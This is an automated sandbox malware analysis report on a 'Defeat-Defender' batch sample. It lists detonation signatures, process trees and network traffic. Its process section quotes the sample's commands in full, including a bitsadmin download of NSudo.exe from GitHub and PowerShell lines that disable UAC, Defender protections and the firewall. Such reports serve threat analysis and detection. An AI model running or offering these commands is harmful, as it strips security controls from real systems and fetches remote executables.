Malware Analysis Report

2024-10-16 05:03

Sample ID 240806-x91b3ssamf
Target Defeat-Defender-V1.2.0-main.zip
SHA256 9a6e38be267702f3b397fdc416dc2d0d520239dc8d3d983e353e0422ac7941fe
Tags
dropper evasion execution persistence privilege_escalation trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9a6e38be267702f3b397fdc416dc2d0d520239dc8d3d983e353e0422ac7941fe

Threat Level: Known bad

The file Defeat-Defender-V1.2.0-main.zip was found to be: Known bad.

Malicious Activity Summary

dropper evasion execution persistence privilege_escalation trojan

UAC bypass

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Download via BitsAdmin

Legitimate hosting services abused for malware hosting/C2

Event Triggered Execution: Netsh Helper DLL

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Modifies registry class

Checks processor information in registry

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 19:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win7-20240729-en

Max time kernel

16s

Max time network

17s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2540 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 2540 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 2540 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 2540 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 2540 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 2540 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat"

C:\Windows\system32\cacls.exe

"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"

C:\Windows\system32\wscript.exe

wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\tmp.vbs

MD5 9313d55e26ad30ddcbc046fe8013a21d
SHA1 a5712ce8864d7b0ca88b94c64226dfeb2221457f
SHA256 121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a
SHA512 77b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

148s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4824 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 4824 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 4824 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 4824 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 4824 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 4824 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 4824 wrote to memory of 464 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 464 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 3948 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 3948 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 3848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 3848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 4928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 4928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 4000 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 4000 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4544 wrote to memory of 3096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe
PID 4544 wrote to memory of 3096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe
PID 4532 wrote to memory of 2640 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4532 wrote to memory of 2640 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4532 wrote to memory of 2640 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4532 wrote to memory of 2640 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4532 wrote to memory of 2640 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4532 wrote to memory of 2640 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4532 wrote to memory of 2640 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4532 wrote to memory of 2640 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4532 wrote to memory of 2640 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4532 wrote to memory of 2640 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4532 wrote to memory of 2640 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2640 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat"

C:\Windows\system32\cacls.exe

"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"

C:\Windows\system32\wscript.exe

wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "netsh advfirewall set allprofiles state off"

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Documents\RestoreAdd.xlsx"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60673b37-9128-4018-9bd8-d6073175fef9} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 23638 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0634ca4-ec5b-462c-b5df-fa7b30041b7e} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2916 -prefMapHandle 2968 -prefsLen 23779 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfc42829-52e8-4f35-93a7-c59cbeaf1372} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2744 -childID 2 -isForBrowser -prefsHandle 3700 -prefMapHandle 3696 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa8c8459-94e9-49ef-b2d8-0c6251b42a25} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4712 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4716 -prefMapHandle 4756 -prefsLen 29012 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46d0ee7c-afd8-4d62-a74f-ee81124ea5d6} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -childID 3 -isForBrowser -prefsHandle 5452 -prefMapHandle 5448 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11539aa5-ffc0-469e-ae2a-70d5f5ee2b4a} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5640 -childID 4 -isForBrowser -prefsHandle 5560 -prefMapHandle 5564 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b214495-18e7-4d1e-8ab2-67ba649de502} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 5 -isForBrowser -prefsHandle 5760 -prefMapHandle 5768 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc444eed-2e08-408a-8efa-d3f1868ae8d4} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5972 -childID 6 -isForBrowser -prefsHandle 5996 -prefMapHandle 5992 -prefsLen 27211 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec55a889-6c6b-46a5-a0e9-fbd754832f4b} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 161.99.165.35.in-addr.arpa udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
N/A 127.0.0.1:56645 tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
N/A 127.0.0.1:56652 tcp
